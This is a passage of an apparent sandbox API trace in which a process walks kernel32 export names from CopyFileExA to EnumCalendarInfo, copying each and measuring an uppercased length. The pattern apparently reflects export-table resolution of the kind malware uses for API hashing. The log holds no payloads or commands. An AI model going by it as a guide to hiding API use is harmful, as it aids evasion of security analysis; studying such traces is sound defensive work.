returned="CopyFileExA" [0078.284] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.284] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.284] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.284] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.284] lstrlenA (lpString="COPYFILEW") returned 9 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.284] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.284] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.284] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.284] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.284] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.284] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.284] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.284] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.284] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.284] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.284] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.284] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.284] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.285] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.285] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.285] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.285] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.285] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.285] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.285] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.285] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.285] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.285] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.285] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.285] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.285] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.285] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.285] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.285] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.285] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.285] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.285] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.286] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.286] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.286] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.286] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.286] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.286] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.286] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.286] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.286] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.286] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.286] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.286] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.286] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.286] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.286] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.286] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.286] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.286] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.286] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.287] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.287] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.287] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.287] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.287] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.287] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.287] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.287] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.287] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.287] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.287] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.287] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.287] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.287] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.287] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.287] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.287] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.287] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.287] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.288] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.288] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.288] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.288] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.288] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.288] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.288] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.288] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.288] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.288] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.288] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.288] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.288] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.288] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.288] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.288] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.288] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.288] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.288] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.289] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.289] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.289] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.289] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.289] lstrlenA (lpString="DELETEATOM") returned 10 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.289] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.289] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.289] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.289] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.289] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.289] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.289] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.289] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.289] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.289] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.289] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.289] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.289] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.289] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.290] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.290] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.290] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.290] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.290] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.290] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.290] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.290] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.290] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.290] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.290] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.290] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.290] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.290] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.290] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.290] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.290] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.290] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.290] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.290] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.291] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.291] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.291] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.291] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.291] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: 